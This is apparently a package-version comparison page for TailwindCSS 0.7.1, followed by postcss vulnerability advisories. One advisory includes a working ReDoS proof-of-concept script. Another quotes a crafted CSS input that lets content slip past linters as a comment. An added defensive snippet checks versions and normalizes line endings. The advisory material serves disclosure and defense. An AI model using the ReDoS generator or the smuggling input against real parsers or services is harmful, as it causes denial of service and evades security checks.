TailwindCSS moved from version 0.7.0 to 0.7.1, an incremental update for developers using this utility-first CSS framework. The package description is unchanged and still describes a framework for rapidly building custom user interfaces, but the dependencies and build metadata differ. The main change is the autoprefixer dependency, which jumps from version 7.1.6 in 0.7.0 to version 9.3.1 in 0.7.1. This upgrade likely brings support for newer CSS features and browser prefixes, giving broader compatibility when working with current CSS standards.
The distribution metadata also shows a slight increase in fileCount (from 120 to 122) and unpackedSize (from 2089196 to 2112595), which suggests new features, bug fixes, or documentation updates. Developers can expect improved CSS processing, potentially with more efficient or more comprehensive prefixing. The short gap between release dates points to a quick turnaround, implying updates or refinements that prompted the new version. By upgrading to 0.7.1, developers get a more modern build pipeline and the browser compatibility data of a recent Autoprefixer release while continuing to work with the tailwindcss framework.
All vulnerabilities related to version 0.7.1 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a stylesheet that repeats the source-map annotation prefix n times
// and ends with a character that never completes the annotation.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm up the parser with a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Measure how parse time grows with the number of repeated annotations.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
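As an added example (not code from this page, from PostCSS or from Tailwind), the following Node.js snippet checks an installed postcss version against the two advisories above and normalizes line endings in untrusted CSS before it reaches a PostCSS-based linter. The version ranges are the ones stated above, with "between 8.0.0 and 8.2.13" read as ending at the patched 8.2.13 (an assumption), and the normalization applies the same CR/CRLF-to-LF preprocessing step that browsers perform under CSS Syntax Level 3.

```javascript
// Added example, not part of the page or of PostCSS/Tailwind.
// Advisory ranges are taken from the two entries described on this page.
const POSTCSS_ADVISORIES = [
  {
    id: "ReDoS via getAnnotationURL()/loadAnnotation() in lib/previous-map.js",
    // "before 7.0.36 or between 8.0.0 and 8.2.13": the upper bound is read as
    // exclusive, 8.2.13 being the patched release (assumption).
    affected: (v) => cmp(v, "7.0.36") < 0 || (cmp(v, "8.0.0") >= 0 && cmp(v, "8.2.13") < 0),
  },
  {
    id: "\\r line-return parsing discrepancy (fixed in 8.4.31)",
    affected: (v) => cmp(v, "8.4.31") < 0,
  },
];

// Compare dotted numeric versions; a pre-release suffix is ignored (assumption).
function cmp(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Return the ids of the advisories that apply to an installed postcss version.
function postcssAdvisories(version) {
  return POSTCSS_ADVISORIES.filter((a) => a.affected(version)).map((a) => a.id);
}

// Linter-side mitigation for the second advisory: browsers replace CR and CRLF
// with LF before tokenizing (CSS Syntax Level 3 input preprocessing), so doing
// the same before PostCSS parses untrusted CSS removes the \r-based divergence
// between what the linter sees and what the browser sees.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, "\n");
}

if (typeof require !== "undefined" && require.main === module) {
  for (const v of ["7.0.35", "8.2.13", "8.4.30", "8.4.31"]) {
    console.log(v, postcssAdvisories(v));
  }
  // Constructed input taken from the advisory text above.
  console.log(JSON.stringify(normalizeLineEndings("@font-face{ font:(\r/*);}")));
}
```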